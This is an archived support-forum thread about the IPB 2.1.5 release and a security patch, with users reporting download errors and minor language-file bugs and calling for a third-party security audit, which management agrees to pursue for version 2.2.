Jump to content

IPB 2.1.5 Released

Guest IPS News

By Guest IPS News
in Feedback

Recommended Posts

  • Replies 390
  • Created
  • Last Reply
bfarber Grand Master

bfarber

Posted
Posted

I'm not sure what you mean?

I just downloaded the new security patch (which, before anyone asks, addresses *different* issues, not the one from the link to securityadvisory) and I downloaded the updated copy of 2.1.5, which is patched.

You're not seeing the patch itself in the client center? Click on the link to download another version, and it should be listed on that page. Was for me. :blink:

Logan Mentor

Logan

Posted
Posted

Thanks for the patch.

Wow, there is a lot of patches listed in the client center I almost downloaded the wrong one.

Maybe it's time to clean out all the old ones?

BTW: There are no changes in calendar.php even though it's in the patch :S

AtariAge Veteran

AtariAge

Posted
Posted

I clicked the "download page" link in the security patch announcement, and then clicked "Download >>" and received the following error:

mySQL query error: SELECT * FROM download_packages WHERE download_id= AND download_allow LIKE '%,2,%'



SQL error:


SQL error code:


Date: Wednesday 08th of March 2006 10:11:16 AM


Edit: I was able to download the patch manually by logging into the client center and following the chain of links to get to the patch.

..Al
bfarber Grand Master

bfarber

Posted
Posted

@Logan, there was an SQL exploit in the calendar that *may* have been patched in the first release of 2.1.5. I thought it was reported after 2.1.5 was ready for release, but perhaps the patch had made it in before 2.1.5 was actually released initially?

marcele Enthusiast

marcele

Posted
Posted

I'm thinking that now would be a great time to have a THIRD PARTY security review of its products (Say from gulftech)? The IPB codebase is stable and their aren't going to be many changes for a while. While I understand that security updates are a fact of life, the frequency of these exploits are really starting to look bad. (Yes Brandon the patch in calendar.php was included in 2.15) ..

Logan Mentor

Logan

Posted
Posted

I'm thinking that now would be a great time to have a THIRD PARTY security review of its products (Say from gulftech)? The IPB codebase is stable and their aren't going to be many changes for a while. While I understand that security updates are a fact of life, the frequency of these exploits are really starting to look bad. (Yes Brandon the patch in calendar.php was included in 2.15) ..


I very much agree!
bfarber Grand Master

bfarber

Posted
Posted

While I understand that security updates are a fact of life, the frequency of these exploits are really starting to look bad.



I think that the bulk of the exploits have either been present since 1.x/2.x, and/or have been present in all versions of 2.1. They are just coming to light now, and rather than try to "save face" we'd reather release an update to address the issues as they are discovered.

It's very probable that a few of the security exploits we recently patched are present in other online software - as some of them are not very widely known. Do some research on moz-binding for example...IPB is protected against this, but it is quite a scary thing.

Anyways, I think the possibilty of a third party security reviewer has been discussed in the past. I can't comment on it's status or the result of the discussions however.
marcele Enthusiast

marcele

Posted
Posted

I think that the bulk of the exploits have either been present since 1.x/2.x, and/or have been present in all versions of 2.1. They are just coming to light now, and rather than try to "save face" we'd reather release an update to address the issues as they are discovered.



Anyways, I think the possibilty of a third party security reviewer has been discussed in the past. I can't comment on it's status or the result of the discussions however.



Yes I've talked to Matt about it and he said that its something that IPS might look into (that was some time ago). That's why it would be great to get "another persons eyes" going through all the code. Gulftech really knows their stuff (finding little known exploits in a tonne of different PHP software) . I think that it would really enspire confidence to your customers that not only are you willing to patch your software quickly when exploits are found (like every other forum software vendor) but that you are "pro-actively" trying to find them before they are even public. I think its just another way that IPS could jump above the competition.
Invisionary Enthusiast

Invisionary

Posted
Posted

In lang_search.php 'nav_au' appears twice. Once as "All posts by a member" and once as "Active Topics".

Generally speaking, I don't know what I'm talking about but won't that cause a conflict? I mean... how does the software know which line of text to display? :huh:

EDIT: And lang_ucp.php still has place names Colombo and Dhaka as Colomba and Dhakra

That is old, guys!

Michael P Explorer

Michael P

Posted
Posted

My license for one forum expired a few days before this patch - am I allowed to apply the security patch to my forum?

I agree - an external security code review is needed. IPS became a commercial / customer orientated company - playing with the big boys now (I mean with respect to software and Internet software, not just other forums) so they need to be more professional about security. Security updates are good - but they should not be as frequent - something which a security audit could solve.

bfarber Grand Master

bfarber

Posted
Posted

WOW! Look like alot of people having problem with IPB 2.1.5 ..



Im not gonna upgrade it, I wait till IPB 2.1.6



Seriously? :huh:

There really aren't any/many problems here.....

Anyways, the next planned release will be 2.2, not 2.1.6 :)

@marcele...it's funny. I've actually brought up this suggestion with my supervisors as well. :) Anyways, it is a decision management has to weigh and finally draw a conclusion as to whether the cost-benefit is worth it.

Note: the moz-binding issue I mentioned earlier has not, to date, been exploited as far as we know. It was a fix made proactively. :) I do see where you are going though. ;)

@Invisionary, if that is the case, the only "side effect" is the text that appears later in the file will be shown. I'd recommend submitting it to the bug tracker just so it's not overlooked in the next release, but really, that's quite minor. :)
Invisionary Enthusiast

Invisionary

Posted
Posted

@Invisionary, if that is the case, the only "side effect" is the text that appears later in the file will be shown. I'd recommend submitting it to the bug tracker just so it's not overlooked in the next release, but really, that's quite minor. :)


I told you I didn't know what I was talking about :)

So, to clarify, the second line ("Active Topics") will be displayed each time 'nav_au' is called? If that's the case I need to find every call to it and check it doesn't really need to display the first line ("All posts by a member") as one could look out of place when replacing the other... I think :blink:
Mesmer Collaborator

Mesmer

Posted
Posted

WOW! Look like alot of people having problem with IPB 2.1.5 ..



Im not gonna upgrade it, I wait till IPB 2.1.6




Most of those people have problems because they have mods installed. This group has often problems when they upgrade/update their board.

I upgraded with no problems whatsoever.
bfarber Grand Master

bfarber

Posted
Posted

Hello,

We do not have instructions for manually patching IPB to get it to 2.1.5.....

// Edit, ah, I see, manual edits for the security patch. Confusing discussing both in one topic. :blink:

@Invisionary, well, it's a bug, and it isn't at the same time. It has an undesired effect (I'm guessing at least) but won't cause any problems with the script execution (i.e. errors). :)

Spirix Rookie

Spirix

Posted
Posted

Thanks for the 2.1.5 upgrade, and the security patch. Everything went extremely well except for some MySQL thing that was running twice. But was not due to IPB's fualt but from some mod.

Personally, I do not mind security patches because they really are the easiest thing to install/patch. Even if IPS release's 5 a week I wouldn't care. As long as I know they are activly trying to fix the software.

Good job to bfarber and team! :D

zwelch82 Newbie

zwelch82

Posted
Posted

@bfarber: the feature "Remove incomplete registration validations after [x] days" does not work......it does not remove the unvalidated accunts. :(

what can I do?

  • Management
Lindy Grand Master

Lindy

Posted
  • Management
Posted

I'm thinking that now would be a great time to have a THIRD PARTY security review of its products (Say from gulftech)? The IPB codebase is stable and their aren't going to be many changes for a while. While I understand that security updates are a fact of life, the frequency of these exploits are really starting to look bad. (Yes Brandon the patch in calendar.php was included in 2.15) ..



We agree that it's a great idea - an extra set of eyes never hurts. I've been in talks with a couple of security auditing firms and we are going to shoot for an audit of 2.2. :)

Archived

This topic is now archived and is closed to further replies.

Go to topic listing

  • Recently Browsing   0 members

    • No registered users viewing this page.
Invision Community © 2024 IPS, Inc.
×
×
  • Create New...